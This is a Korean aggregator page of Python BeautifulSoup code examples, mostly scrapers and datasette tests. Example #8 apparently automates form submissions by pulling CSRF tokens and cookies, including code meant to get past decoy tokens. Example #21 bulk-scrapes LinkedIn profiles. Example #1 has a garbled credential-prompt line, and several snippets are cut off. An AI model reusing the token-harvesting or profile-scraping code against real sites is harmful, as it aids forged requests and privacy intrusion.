Python Soup.Soup 예제들, bs4.Soup.Soup Python 예제들

예제 #1

0

파일 보기

파일: BrightSpacingOnLSD.py 프로젝트: userlandkernel/HVA

    def Login(self, username=None, password=None):

        if self.username:
            username = self.username

        if self.password:
            password = self.password

        # request username if needed
        if username == None or len(username) < 3:
            username = str(input("username: "******"Password too long, must be less than 128 characters.")

        credentials = {
            "UserName": username,
            "Password": password,
            "AuthMethod": "FormsAuthentication"
        }

        # Get the URL with the csrf token
        self.prepare()

        # Make the login request
        ADFSResponse = self.s.post(
            self.adfs,
            data=credentials,
            headers={
                "Content-Type":
                "application/x-www-form-urlencoded; charset=UTF-8"
            },
            allow_redirects=True)

        soup = Soup(ADFSResponse.text, "html.parser")

        # Check if an error occured
        error = soup.find("span", {"id": "errorText"})
        if error:
            error = error.text

        if error:
            raise BaseException(str(error))

        print("[+] Authenticated with domain controller SSO!")

        # Fetch redirect location for active directory SAML authentication
        ADController = soup.find("form", {"name": "hiddenform"})
        if not ADController:
            raise BaseException(
                "An unknown error occured while authenticating with the controller."
            )

        ADController = ADController['action']
        if not ADController:
            raise BaseException(
                "An unknown error occured while authenticating with the controller: No engine in response."
            )

        # Fetch SAML session
        SAMLResponse = soup.find("input", {"name": "SAMLResponse"})
        if not SAMLResponse:
            raise BaseException(
                "An unknown error occured while authenticating with the controller: No SAML in response."
            )

        SAMLResponse = SAMLResponse['value']
        if not SAMLResponse:
            raise BaseException(
                "An unknown error occured while authenticating with the controller: No SAML in response."
            )

        SAMLSession = {"SAMLResponse": SAMLResponse}

        # Finally log in at domain controller
        ADCTLResponse = self.s.post(ADController,
                                    data=SAMLSession,
                                    allow_redirects=True)

        # Check if authentication succeeded
        if ADCTLResponse.status_code != 200:
            raise BaseException("Authentication failure: " +
                                responses[ADCTLResponse.status_code])

        print("[+] Got SAML session, can now authenticate with application.")

        # Continue to brightspace controller
        soup = Soup(ADCTLResponse.text, "html.parser")

        # Get the processform
        DLOController = soup.find("form", {"id": "ProcessForm"})

        if not DLOController:
            raise BaseException("Failed to retrieve DLO controller")

        # Retrieve  the brightspace controller
        DLOController = DLOController['action']

        if not DLOController:
            raise BaseException("Failed to retrieve DLO controller")

        # Fetch SAML session
        SAMLResponse = soup.find("input", {"name": "SAMLResponse"})
        if not SAMLResponse:
            raise BaseException(
                "An unknown error occured while authenticating with the controller: No SAML in response."
            )

        SAMLResponse = SAMLResponse['value']
        if not SAMLResponse:
            raise BaseException(
                "An unknown error occured while authenticating with the controller: No SAML in response."
            )

        SAMLSession = {
            "SAMLResponse": SAMLResponse,
        }

        # Authenticate with brightspace
        DLOCTLResponse = self.s.post(DLOController,
                                     data=SAMLSession,
                                     allow_redirects=True)

        if DLOCTLResponse.status_code != 200:
            print("Failed to login at brightspace, reason: %s" %
                  responses[DLOCTLResponse.status_code])

        print("Welcome to the Digital Learning Environment of HVA")
        print("-" * 25)

예제 #2

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_definition_sql(path, expected_definition_sql, app_client):
    response = app_client.get(path)
    pre = Soup(response.body, "html.parser").select_one("pre.wrapped-sql")
    assert expected_definition_sql == pre.string

예제 #3

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_facet_display(app_client):
    response = app_client.get(
        "/fixtures/facetable?_facet=planet_int&_facet=city_id&_facet=on_earth")
    assert response.status == 200
    soup = Soup(response.body, "html.parser")
    divs = soup.find("div", {"class": "facet-results"}).findAll("div")
    actual = []
    for div in divs:
        actual.append({
            "name":
            div.find("strong").text,
            "items": [{
                "name":
                a.text,
                "qs":
                a["href"].split("?")[-1],
                "count":
                int(str(a.parent).split("</a>")[1].split("<")[0]),
            } for a in div.find("ul").findAll("a")],
        })
    assert [
        {
            "name":
            "city_id",
            "items": [
                {
                    "name": "San Francisco",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=1",
                    "count": 6,
                },
                {
                    "name": "Los Angeles",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=2",
                    "count": 4,
                },
                {
                    "name": "Detroit",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=3",
                    "count": 4,
                },
                {
                    "name": "Memnonia",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=4",
                    "count": 1,
                },
            ],
        },
        {
            "name":
            "planet_int",
            "items": [
                {
                    "name": "1",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&planet_int=1",
                    "count": 14,
                },
                {
                    "name": "2",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&planet_int=2",
                    "count": 1,
                },
            ],
        },
        {
            "name":
            "on_earth",
            "items": [
                {
                    "name": "1",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&on_earth=1",
                    "count": 14,
                },
                {
                    "name": "0",
                    "qs":
                    "_facet=planet_int&_facet=city_id&_facet=on_earth&on_earth=0",
                    "count": 1,
                },
            ],
        },
    ] == actual

예제 #4

0

파일 보기

import scraperwiki
import urllib2
import re
from bs4 import BeautifulSoup as Soup

url = "http://nl.wikipedia.org/wiki/Lijst_van_huidige_burgemeesters_in_Nederland"

#for num in range (0, 10):
#   baseplusnr = base_url+str(num)
#  url = baseplusnr
# #print url

soup = Soup(url)
hl = soup.findAll("tr")
#hlclean = hl.href.string
print hl
import scraperwiki
import urllib2
import re
from bs4 import BeautifulSoup as Soup

url = "http://nl.wikipedia.org/wiki/Lijst_van_huidige_burgemeesters_in_Nederland"

#for num in range (0, 10):
#   baseplusnr = base_url+str(num)
#  url = baseplusnr
# #print url

soup = Soup(url)
hl = soup.findAll("tr")
#hlclean = hl.href.string

예제 #5

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_metadata_json_html(app_client):
    response = app_client.get("/-/metadata")
    assert response.status == 200
    pre = Soup(response.body, "html.parser").find("pre")
    assert METADATA == json.loads(pre.text)

예제 #6

0

파일 보기

 def query_13f(self):
     # narrow query paras to '13F-HR' type and return results
     query_13f = self.query + "&type=13F-HR&dateb=&owner=include&count=40"
     query_13f_resp = requests.get(query_13f)
     query_13f_soup = Soup(query_13f_resp.text, "html.parser")
     return query_13f_soup

예제 #7

0

파일 보기

파일: suppli.py 프로젝트: badrivamsi/web-scraping

driver = webdriver.Chrome(chrome_path)


def go_to_about(sup_url):
    about = driver.get()
    about_html = about.read()
    about.close()
    about_soup = Soup(about_html, "html.parser")
    nav = about_soup.nav

    for url in nav.findAll("a"):
        #count = count+1
        sub_url = url.get('href')
        tot_url = parse.urljoin(sup_url, sub_url)
        print(tot_url)


my_url = 'https://dir.indiamart.com/impcat/peanutbutter-all.html'
uClient = uReq(my_url)
page_html = uClient.read()
uClient.close()
page_soup = Soup(page_html, "html.parser")
containers = page_soup.findAll("div", {"class": "prr w100"})
for container in containers:
    main_link = container.a["href"]
    #mainn = Soup(main_link, "html.parser")
    go_to_about(main_link)
    #break
    #print(len(containers))
    #print(main_link)

예제 #8

0

파일 보기

def parametersfunc(threadName, p, url, save, second_way, page):
	#set some variables
	parameters = {}
	#make the parameters a list
	parameters_list = p.split("/")
	#make parameters list a dictionary (needed from the requests module)
	for i in range(0,len(parameters_list)):
		para = parameters_list[i].split("=")
		parameters[para[0]] = para[1]
	#make a url get request to get the cookies and the csrf token
	req = requests.get(url)
	#extract the cookies
	cookie = req.cookies
	#extract the csrf token and add it to parameters
	#if the csrf token is embedded in the HTML:
	for key, value in parameters.items():
		if value == "TOKEN":
			html = req.text
			soup = Soup(html, 'lxml')
			try:
				csrf_token = soup.find_all(attrs={ "name" : key })[0].get('value')
			except IndexError:
				return
			else:
				#replace TOKEN with the csrf_token
				parameters[key] = csrf_token
	#if the csrf token is in a script:
	for key, value in parameters.items():
		if value == "SCRIPT":
			html = req.text
			csrf_token = ""
			try:
				#search the html text for the csrf_token
				re.search(key + ".*?value.*?=.*?\w.*?;", html)
			except IndexError:
				return
			else:
				#find all accounts of csrf_token in the html text (there might be more than one if
				#the site has included more as comments)
				csrf_token1 = re.findall(key + ".*?value.*?=.*?\w.*?;", html)
				#if there are comments to fool Reaper
				if len(csrf_token1) > 1:
					#make a second get request
					req = requests.get(url)
					#extract the cookies again cause they change with each request
					cookie = req.cookies
					html = req.text
					#find all the accounts of csrf_token in the html text again
					csrf_token2 = re.findall(key + ".*?value.*?=.*?\w.*?;", html)
					#cross-check the results and remove those which are the same
					for i in csrf_token1:
						for j in csrf_token2:
							if i == j:
								csrf_token1.remove(i)
				#token should be a list with 2 items (the csrf_token is included in the 2nd item)
				token = str(csrf_token1).split("=")
				try:
					token[1]
				except IndexError:
					return
				else:
					#get only the alphanumeric characters from the token
					for i in token[1]:
						if i.isalnum():
							csrf_token += i
				#replace TOKEN with the csrf_token
				parameters[key] = csrf_token
	request(url, cookie, parameters, page, second_way, save)

예제 #9

0

파일 보기

from utilities import is_number
from utilities import download_master_file
from utilities import save_error_file

conn = MongoClient()
collection = conn["labbioinfo"]["IBD"]
folders = create_dir('PRJNA389280.txt', 'IBD')
download_master_file('https://ibdmdb.org/tunnel/products/HMP2/Metadata/hmp2_metadata.csv', folders[4])
metadata_set = read_master_file(folders[4], ',')


for filename in os.listdir(folders[3]):
    fullname = os.path.join(folders[3], filename)
    infile = open(fullname,"r")
    contents = infile.read()
    soup = Soup(contents,'xml')
    sample_ID = soup.find('SUBMITTER_ID')
    if sample_ID is not None:
        sampleid = sample_ID.get_text()
        sample_set = metadata_set.loc[metadata_set['Project'] == sampleid]
        sample_set = sample_set.to_dict('index')
        key_loc = list(sample_set.keys())
        sampledict = sample_set[key_loc[0]]
        primary_ID = soup.find('PRIMARY_ID')
        taxon_ID = soup.find('TAXON_ID')
        science_name = soup.find('SCIENTIFIC_NAME')
        tags = soup.findAll('TAG')
        values = soup.findAll('VALUE')
        infile.close()
        tags = [i.get_text() for i in tags]
        loc1 = tags.index("geo_loc_name")

예제 #10

0

파일 보기

파일: cScrape.py 프로젝트: chandshilpa/Scraping

 def parsePage(self):
     self.Soup = Soup(self.page_html, "html.parser")

예제 #11

0

파일 보기

파일: tests.py 프로젝트: StayWokeOrg/collateral-consequence

 def test_add_state_route_get_has_select_list(self, get_data):
     """."""
     response = self.client.get(reverse_lazy("add_state"))
     html = Soup(response.content, "html5lib")
     self.assertEqual(len(html.find_all("option")), len(STATES) - 1)

예제 #12

0

파일 보기

def foo(ID,URL):
	try:
		opener = urllib2.build_opener()
		opener.addheaders = [('User-agent', 'Mozilla/5.0')]
		url = URL
		response = opener.open(url)
		page = response.read()
		#from bs4 import BeautifulSoup
		soup = Soup(page)
		#print soup

		#Head = soup.find('head')

		"""Id = (Head.find('link'))#.encode('utf8', 'ignore').strip()
		id=(Id.get('href')).strip().split('/')[4]
		id=str(id)"""
		
		id=ID
		#print id

		Data=soup.findAll('td',{'class' :'fdata'})
		name=Data[0].text
		#print name

		Website_link=Data[1].find('a')
		website_link=(Website_link.get('href')).strip()
		#print website_link

		category=Data[2].text
		#print category

		active=Data[3].text
		#print active

		founders=Data[4].text
		#print founders

		current_director=Data[5].text
		#print current_director
	
		try:
			Board_of_directors_link=Data[6].find('a')
			board_of_directors_link=(Board_of_directors_link.get('href')).encode('utf8', 'ignore').strip()
			#print board_of_directors_link
		except	Exception,e:
			print "Board of directorerror"+str(e)
		
		politicalaffiliation=Data[7].text
		#print politicalaffiliation

		research=Data[8].text
		#print research

		mission=Data[9].text
		#print mission

		non_profit=Data[10].text
		#print non_profit

		funding=Data[11].text
		#print funding


		address=Data[25].text
		#print address

		phonenumber=Data[27].text
		#print phonenumber

		posturl=soup.find('div',{'class' :'content'})
		post_url=posturl.find('form')
		pourl=(post_url.get('action')).strip()

예제 #13

0

파일 보기

# Constant for setting wallpaper by day of month
DAY_OF_MONTH = date.today().day

# Constant for creating and storing images
STORE_DIRECTORY = os.path.join(
    os.path.expanduser('~'),
    'Pictures/Wallpapers/Hubble Space Advent Calendar 2018')

# Constant for matching filepaths/filenames on CDN
VALID_IMAGE = re.compile(r'.*/a\d{1,2}.*')

# Make the required directories
os.makedirs(STORE_DIRECTORY, exist_ok=True)

# Fetch the page for parsing
page = Soup(urllib.request.urlopen(CALENDAR_URL), 'html.parser')

# Find the containers
images = page.findAll('li', id=re.compile('img(\d{1,2})'))

# Create an empty dictionary to store the valid image URLs
valid_images = {}

# Find the valid image URLs
for image in images:
    image_url = image.find('source',
                           attrs={
                               'data-srcset': re.compile('main_1500')
                           }).get('data-srcset')
    if VALID_IMAGE.match(image_url):
        valid_images[len(valid_images) + 1] = image_url

예제 #14

0

파일 보기

def parse_html(page_html):
    """Html parsing"""
    return Soup(page_html, "html.parser")

예제 #15

0

파일 보기

파일: main.py 프로젝트: aarontinn13/Pontikes

from bs4 import BeautifulSoup as Soup
import requests
import re

page = requests.get(
    'https://www.goodreads.com/book/show/23165017-separate-and-dominate?from_search=true',
    headers={'User-Agent': 'test'})
page = page.text
soup = Soup(page, 'html.parser')
#soup = soup.prettify()
soup = soup.find_all('span')

#print(soup)
for i in soup:
    print(i)
    if i.find(id):
        print(i.get_text())
        print('--------------------------------------------\n')

    #print(text)
'''
    x = i.get('id')
    if x == None:
        continue
    #print(x)
    text = i.find(id)
    print(text)
    #print(text.get_text())

'''

예제 #16

0

파일 보기

파일: __init__.py 프로젝트: daliu/GoogleNews

    def get_news(self, deamplify=False):
        self.url = 'https://news.google.com/'
        try:
            self.req = urllib.request.Request(self.url, headers=self.headers)
            self.response = urllib.request.urlopen(self.req)
            self.page = self.response.read()
            self.content = Soup(self.page, "html.parser")
            self.content = self.content.find("h2").parent.parent.parent
            result = self.content.findChildren("div", recursive=False)
            section = None
            for item in result:
                try:
                    try:
                        section = item.find("h2").find("a").text
                    except Exception as sec_e:
                        pass
                    title = item.find("h3").text
                    if deamplify:
                        try:
                            link = item.find("article").get("jslog").split(
                                '2:')[1].split(';')[0]
                        except Exception as deamp_e:
                            print(deamp_e)
                            link = 'news.google.com/' + item.find("h3").find(
                                "a").get("href")
                    else:
                        link = item.find("h3").find("a").get("href")
                    self.texts.append(title)
                    self.links.append(link)
                    try:
                        datetime = item.find("time").get("datetime")
                    except:
                        datetime = None
                    try:
                        time = item.find("time").text
                    except:
                        time = None
                    try:
                        site = item.find("time").parent.find("a").text
                    except:
                        site = None
                    try:
                        img = item.find("img").get("src")
                    except:
                        img = None
                    desc = None
                    if link.startswith('https://www.youtube.com/watch?v='):
                        desc = 'video'

                    self.results.append({
                        'section': section,
                        'title': title,
                        'datetime': datetime,
                        'time': time,
                        'site': site,
                        'desc': desc,
                        'link': link,
                        'media': None,
                        'img': img
                    })
                except Exception as big_e:
                    pass
            self.response.close()
        except Exception as e:
            print(e)
            pass

예제 #17

0

파일 보기

 def fetch_query(self, query):
     resp = requests.get(query)
     soup = Soup(resp.text, "html.parser")
     return soup

예제 #18

0

파일 보기

파일: nexus.py 프로젝트: sslab-gatech/playcrawl

import sys
import urllib
from bs4 import BeautifulSoup as Soup

BRAND = "nexus"

if __name__ == "__main__":

    if len(sys.argv) < 3:
        sys.exit("Usage: %s <html-file> <download-path>" % sys.argv[0])

    fn = sys.argv[1]
    dn = sys.argv[2]

    with open(fn, "r") as f:
        soup = Soup(f, "html.parser")

    divs = soup.findAll("div", {"class": "devsite-table-wrapper"})
    for div in divs:
        trs = div.find("tbody").findAll("tr")
        for tr in trs:
            td = tr.findAll("td")[0]
            vern = td.text.split(" ")[0]

            a = tr.find("a")
            link = a["href"]
            tokens = link.split("/")[-1].split("-")
            model = tokens[0]
            build = tokens[1]

            name = "%s-%s-%s-%s" % (BRAND, model, build, vern)

예제 #19

0

파일 보기

    ])

    # ----------- copy images over:

    print(destImagesPath)
    if os.path.exists(sourceImagesPath):
        copytree(sourceImagesPath, destImagesPath)

    chapterDict = {}
    chapterDict['path'] = chapter
    chapterDict['href'] = chapter + ".html"

    # ----------- now let's alter the HTML that's produced:

    if os.path.exists(destChapterPath):
        soup = Soup(open(destChapterPath, "rb").read(), "html.parser")

        # --- grab the title from h1

        h1s = soup.find_all("h1")
        if (len(h1s) > 0):
            chapterDict['title'] = h1s[0].getText()
        else:
            chapterDict['title'] = "needs h1"

        chapterDict['chapterListName'] = chapter
        chapterDict['sections'] = []
        chapterDict['destChapterPath'] = destChapterPath

        # --- Grab all the h2 (we call them sections)
        h2s = soup.find_all("h2")

예제 #20

0

파일 보기

파일: __init__.py 프로젝트: ralatsdc/GoogleNews

 def get_news(self, key="",deamplify=False):
     if key != '':
         key = "+".join(key.split(" "))
         self.url = 'https://news.google.com/search?q={}+when:{}&hl={}'.format(key,self.__period,self.__lang.lower())
     else:
         self.url = 'https://news.google.com/?hl={}'.format(self.__lang)
     try:
         self.req = urllib.request.Request(self.url, headers=self.headers)
         self.response = urllib.request.urlopen(self.req)
         self.page = self.response.read()
         self.content = Soup(self.page, "html.parser")
         articles = self.content.select('div[class="NiLAwe y6IFtc R7GTQ keNKEd j7vNaf nID9nc"]')
         for article in articles:
             try:
                 # title
                 try:
                     title=article.find('h3').text
                 except:
                     title=None
                 # description
                 try:
                     desc=article.find('span').text
                 except:
                     desc=None
                 # date
                 try:
                     date = article.find("time").text
                     # date,datetime_tmp = lexial_date_parser(date)
                 except:
                     date = None
                 # datetime
                 try:
                     datetime_chars=article.find('time').get('datetime')
                     datetime_obj = parse(datetime_chars).replace(tzinfo=None)
                 except:
                     datetime_obj=None
                 # link
                 if deamplify:
                     try:
                         link = 'news.google.com/' + article.find("h3").find("a").get("href")
                     except Exception as deamp_e:
                         print(deamp_e)
                         link = article.find("article").get("jslog").split('2:')[1].split(';')[0]
                 else:
                         link = 'news.google.com/' + article.find("h3").find("a").get("href")
                 self.__texts.append(title)
                 self.__links.append(link)
                 if link.startswith('https://www.youtube.com/watch?v='):
                     desc = 'video'
                 # image
                 try:
                     img = article.find("img").get("src")
                 except:
                     img = None
                 # site
                 try:
                     site=article.find("time").parent.find("a").text
                 except:
                     site=None
                 # collection
                 self.__results.append({'title':title,
                                        'desc':desc,
                                        'date':date,
                                        'datetime':datetime_obj,
                                        'link':link,
                                        'img':img,
                                        'media':None,
                                        'site':site})
             except Exception as e_article:
                 print(e_article)
         self.response.close()
     except Exception as e_parser:
         print(e_parser)
         pass

예제 #21

0

파일 보기

파일: scrapper_linkedin_ver3.py 프로젝트: almoslmi/init-py-crawlers

def read_static(params):
    from bs4 import BeautifulSoup as Soup
    from time import time
    import MySQLdb
    import requests
    import json
    import re
    import os
    #import excelHelper
    #import dbHandler
    import time
    #import CreateCSV
    import multiprocessing
    from multiprocessing import Pool
    import random
    import urllib
    import csv
    import traceback
    #import dbHandler
    from selenium import webdriver

    import glob
    #7137737

    #list_of_files = glob.glob("C:\\Users\\Acer\\Desktop\\code\\linkedin code\\2.Crawler\\Dump\\10000-153324087.html")
    list_of_files = glob.glob(
        "C:\\Users\\Acer\\Desktop\\code\\linkedin code\\2.Crawler\\dump\\dump2\\*.html"
    )
    #C:\Users\Acer\Desktop\code\linkedinproject\crawler\next1000
    ##print list_of_files

    process_name = params[2]
    start_index = params[0]
    end_index = params[1]
    effective_list = list_of_files[int(start_index):int(end_index)]

    file_counter = 0

    for files in effective_list:
        try:
            file_counter += 1
            ##print 'Process No.:'+ process_name+' -parsing file no:' + str(file_counter)+":"
            #file_r=open("103-174319117.html").read()
            #soup = Soup(file_r, 'html.parser')
            # #print soup
            filename = open(files, 'rb')
            #print "filename ",filename
            #linkedin_id = ''.join(files.split('y\\')[5].split('.')[:-1])
            employer_of = "n/a"
            ##print linkedin_id
            f = files
            #lid = f[f.find('y\\')+2:f.find('.html')]
            ccid = f[f.find('ump2\\') + 5:f.find('-')]
            lid = f[f.find('-') + 1:f.find('.html')]
            #print ccid
            #lid = f[:f.find('.html')]
            print ccid, "-", lid
            html_content = filename.read()
            ##print
            filename.close()

            soup = Soup(html_content, 'html.parser')
            #print soup
            #print "soup done"
            current_position_date = "N/A"

            # General Details
            try:
                print "General"
                #main_div  = soup.find("div",{"id":"body"}).find("div",{"id":"profile"})
                #top_card = main_div.find("div",{"id":"top-card"}).find("div",{"class":"profile-top-card"}).find("div",{"class":"profile-card"}).find("div",{"class":"profile-overview"}).find("div",{"class":"profile-overview-content"}).find("div",{"class":"masthead"}).find("div",{"data-li-template":"p2_basic_info"}).find("div",{"id":"name_container"})
                ##print main_div.text
                #top_card = main_div.find("span",{"class":"full-name"})
                ##print top_card.text
                gen_det = []

                gen_det.append(ccid)
                gen_det.append(lid)

                try:
                    employee_name = soup.findAll(
                        'span', {'class': 'full-name'})[0].text.encode(
                            'utf-8', 'replace')
                    # [0].text.encode('utf-8','replace')
                    print employee_name
                    #et=soup.findAll('span',{'class':'full-name'})

                    #print  "ename ",employee_name
                except Exception, e:
                    print traceback.format_exc()
                    employee_name = 'NA'
                    #continue
                print employee_name
                gen_det.append(employee_name)
                try:
                    current_title = soup.find("div", {
                        "id": "headline"
                    }).find("p", {
                        "class": "title"
                    }).text.encode('utf-8', 'replace')

                    try:
                        current_position = current_title.split(
                            ' at ')[0].encode('utf-8', 'replace')

                    except:
                        current_position = 'NA'
                    #print "current_position",current_position
                    try:
                        current_company = current_title.split(
                            ' at ')[1].encode('utf-8', 'replace')
                    except:
                        current_company = 'NA'
                    #print "current_company : ",current_company
                except:
                    current_title = "NA"
                #print "title",current_title
                gen_det.append(current_title)
                # Location Details

                all_loc_div = soup.findAll('div', {'id': 'demographics'})
                #all_exp_div = soup.find('div',{'id':'experience-482311328'})
                #print 'Location',len(all_loc_div)

                i = 0

                for div in all_loc_div:
                    i += 1
                    #print "#",i
                    loc = []
                    #final_div = div.find('div',{'id':re.compile('experience-*')})
                    final_div = div

                    try:
                        loc_div = final_div.findAll('span',
                                                    {'class': 'locality'})

                        ##print len(loc_div)
                        loc_name = loc_div[0].findAll('a')
                        ##print major_name[1].text
                        if len(loc_name) > 1:
                            loc_name1 = loc_name[0].text
                            loc_name2 = loc_name[1].text
                            location_name = loc_name1 + " ," + loc_name2
                        else:
                            loc_name1 = loc_name[0].text
                            location_name = loc_name1
                            #field_name2 = field_div[1].find('a').text.encode('utf-8','replace')
                            ##print field_name2
                    except Exception, e:
                        #print str(e)
                        location_name = "N/A"
                    ##print "Location ",location_name

                    loc.append(location_name)
                    try:
                        ind_div = final_div.findAll('dd',
                                                    {'class': 'industry'})
                        ind = []
                        ##print len(ind_div)
                        ind_name = ind_div[0].findAll('a')
                        ##print major_name[1].text
                        if len(ind_name) > 1:
                            ind_name1 = ind_name[0].text
                            loc_name2 = ind_name[1].text
                            industry_name = ind_name1 + " ," + ind_name2
                        else:
                            ind_name1 = ind_name[0].text
                            industry_name = ind_name1
                            #field_name2 = field_div[1].find('a').text.encode('utf-8','replace')
                            ##print field_name2
                    except Exception, e:
                        #print str(e)
                        industry_name = "N/A"
                    #print "Industry ",industry_name
                    ind.append(industry_name)
                gen_det.append(location_name)
                gen_det.append(industry_name)
                #print gen_det

                #current prvious edu

                curr_div = soup.find(
                    'tr', {'id': re.compile('overview-summary-current')})
                curr = []
                if curr_div is not None:

                    stri_c = ""
                    final_div = curr_div.findAll('a')
                    for k in final_div:

                        try:
                            c = k.text
                        except:
                            c = NA
                        p = c.find('Edit ')
                        if p != -1:
                            pass
                        else:
                            #stri=""+c
                            curr.append(c)
                else:
                    stri_c = ""
                    curr.append("NA")
                    curr.append("NA")
                for i in range(1, len(curr)):
                    if i == len(curr) - 1:
                        stri_c += curr[i]
                    else:
                        stri_c += curr[i] + ","
                gen_det.append(stri_c)
                #print

                prev_div = soup.find(
                    'tr', {'id': re.compile('overview-summary-past')})
                prev = []
                if prev_div is not None:

                    stri_p = ""
                    final_div = prev_div.findAll('a')
                    for k in final_div:
                        try:
                            c = k.text
                        except:
                            c = NA
                        p = c.find('Edit ')
                        if p != -1:
                            pass
                        else:
                            #stri=""+c
                            prev.append(c)

                else:
                    stri_p = ""
                    prev.append("NA")
                    prev.append("NA")
                #print prev
                for i in range(1, len(prev)):
                    if i == len(prev) - 1:
                        stri_p += prev[i]
                    else:
                        stri_p += prev[i] + ","
                gen_det.append(stri_p)

                #gen_det(stri)
                educa_div = soup.find(
                    'tr', {'id': re.compile('overview-summary-education')})
                educa = []
                if educa_div is not None:

                    stri_e = ""
                    final_div = educa_div.findAll('a')
                    for k in final_div:

                        try:
                            c = k.text
                        except:
                            c = NA
                        p = c.find('Edit ')
                        if p != -1:
                            pass
                        else:
                            #stri=""+c
                            educa.append(c)
                else:
                    stri_e = ""
                    educa.append("NA")
                    educa.append("NA")
                for i in range(1, len(educa)):
                    if i == len(educa) - 1:
                        stri_e += educa[i]
                    else:
                        stri_e += educa[i] + ","
                #educ=stri.encode('utf-8','replace')
                gen_det.append(stri_e)
                print gen_det
                dbHandler.addsgendata(gen_det)

                # ExperienceDetails
                all_exp_div = soup.findAll(
                    'div', {'id': re.compile('experience-.*-view')})
                #all_exp_div = soup.find('div',{'id':'experience-482311328'})
                #print 'experience',len(all_exp_div)

                i = 0

                for div in all_exp_div:
                    i += 1
                    #print "#",i
                    pos = []

                    pos.append(ccid)
                    pos.append(lid)
                    #final_div = div.find('div',{'id':re.compile('experience-*')})
                    final_div = div
                    try:
                        title = final_div.find('h4').text.encode(
                            'utf-8', 'replace')
                        ##print title
                    except:
                        title = "N/A"
                    #print "title ",title
                    pos.append(title)
                    try:
                        company_div = final_div.find('header').find_all('h5')
                        if len(company_div) > 1:
                            company_name = company_div[1].find(
                                'a').text.encode('utf-8', 'replace')
                        else:
                            company_name = company_div[0].find(
                                'a').text.encode('utf-8', 'replace')

                    except Exception, e:
                        #print str(e)
                        company_name = "N/A"
                    #print "company_name ",company_name
                    pos.append(company_name)

                    try:
                        date_s = final_div.find(
                            'span', {'class': 'experience-date-locale'})
                        try:

                            loc = date_s.find('span', {
                                'class': 'locality'
                            }).text.encode('utf-8', 'replace')
                        except:
                            loc = "NA"
                        try:

                            date_span = date_s.text.encode('utf-8', 'replace')
                            ds = date_span.decode('utf-8').split(u'\u2013')

                            end = ds[1].replace(loc, "")
                        except:
                            ds = ["N/A"]
                            end = "NA"

                    except:
                        loc = "NA"
                        ds = ["N/A"]
                        end = "NA"

                    #print "date_span ",ds

                    pos.append(ds[0])

                    pos.append(end)
                    pos.append(loc)

예제 #22

0

파일 보기

파일: parsetrees.py 프로젝트: anisabnis/graph_inference

dir = str(sys.argv[1])
enc = str(sys.argv[2])

mapping = defaultdict(str)

os.system("cat dict.txt | grep i | grep _ | sed -n '/ /s/  */ /gp' > var.txt")
os.system("sed 's/^[ \t]*//' var.txt > sol.txt")

f = open("sol.txt", "r")
for l in f:
    l = l.strip().split(' ')
    mapping[l[0]] = l[1]
f.close()

handle = open(dir + '/res' + enc + '.xml').read()
soup = Soup(handle, 'xml')


def hasNumbers(inputString):
    return any(char.isdigit() for char in inputString)


variables = defaultdict(int)

for var in soup.findAll('variable'):
    var_name = var["name"]
    var_value = round(float(var["value"]))
    variables[var_name] = var_value

os.system(
    "cat tree.lst | grep 'VAR ' | grep -v objvar | cut -d ' ' -f 3- | sed -n '/ /s/  */ /gp' | cut -d ' ' -f 1,3 > solution.txt"

예제 #23

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_canned_query_default_title(app_client):
    response = app_client.get("/fixtures/magic_parameters")
    assert response.status == 200
    soup = Soup(response.body, "html.parser")
    assert "fixtures: magic_parameters" == soup.find("h1").text

예제 #24

0

파일 보기

import urllib
import urllib2, sys
from bs4 import BeautifulSoup as Soup
import re

# werkwijze: open een pagina, haal de inhoud op, geef aan welke data je wilt hebben, sla die op, ga naar de volgende pagina

#samenstellen van de url die uit 3 elementen bestaat: vaste base_url, een oplopende id en een vaste uitgang

base_url = "http://evenementen.uitslagen.nl/2013/marathonrotterdam/details.php?s="
end_url = "&o=1&t=nl"

for num in range(1, 3):
    html = base_url + str(num)
    url = html + end_url  #dit koppelt de drie elementen van de url aan elkaar
    soup = Soup(urllib.urlopen(url))  #open de pagina

    # onderstaand blokje is uit ammar: blok ruwe data/tags in één veld
    #for url in urls:
    #print "Scraping", url
    #page = scraperwiki.scrape(url)
    #if page is not None:
    #naam = re.findall("Naam(.*?)</table>", page, re.DOTALL)
    #data = {'Naam': naam}
    #scraperwiki.sqlite.save(['Naam'], data)

    # alle losse cellen in aparte velden, maar wel drie keer de tabel
    #table = soup.find("table")
    #for row in table.findAll("tr"):
    #   for cell in row.findAll("td"):
    #      print cell.findAll(text=True)

예제 #25

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_zero_results(app_client, path):
    response = app_client.get(path)
    soup = Soup(response.text, "html.parser")
    assert 0 == len(soup.select("table"))
    assert 1 == len(soup.select("p.zero-results"))

예제 #26

0

파일 보기

def phase(config, session=False):
    url = "https://www.lectio.dk/lectio/%s/studieplan/forloeb_vis.aspx?phaseid=%s" % (
        str(config["school_id"]), str(config["phase_id"]))

    if session is False:
        session = authenticate.authenticate(config)

    if session == False:
        return {"status": "error", "type": "authenticate"}

    cookies = {
        "lecmobile": "0",
        "ASP.NET_SessionId": session["ASP.NET_SessionId"],
        "LastLoginUserName": session["LastLoginUserName"],
        "lectiogsc": session["lectiogsc"],
        "LectioTicket": session["LectioTicket"]
    }

    # Insert User-agent headers and the cookie information
    headers = {
        "User-Agent":
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "Host": "www.lectio.dk",
        "Origin": "https://www.lectio.dk",
        "Cookie": functions.implode(cookies, "{{index}}={{value}}", "; ")
    }

    response = proxy.session.get(url, headers=headers)

    html = response.text

    soup = Soup(html)

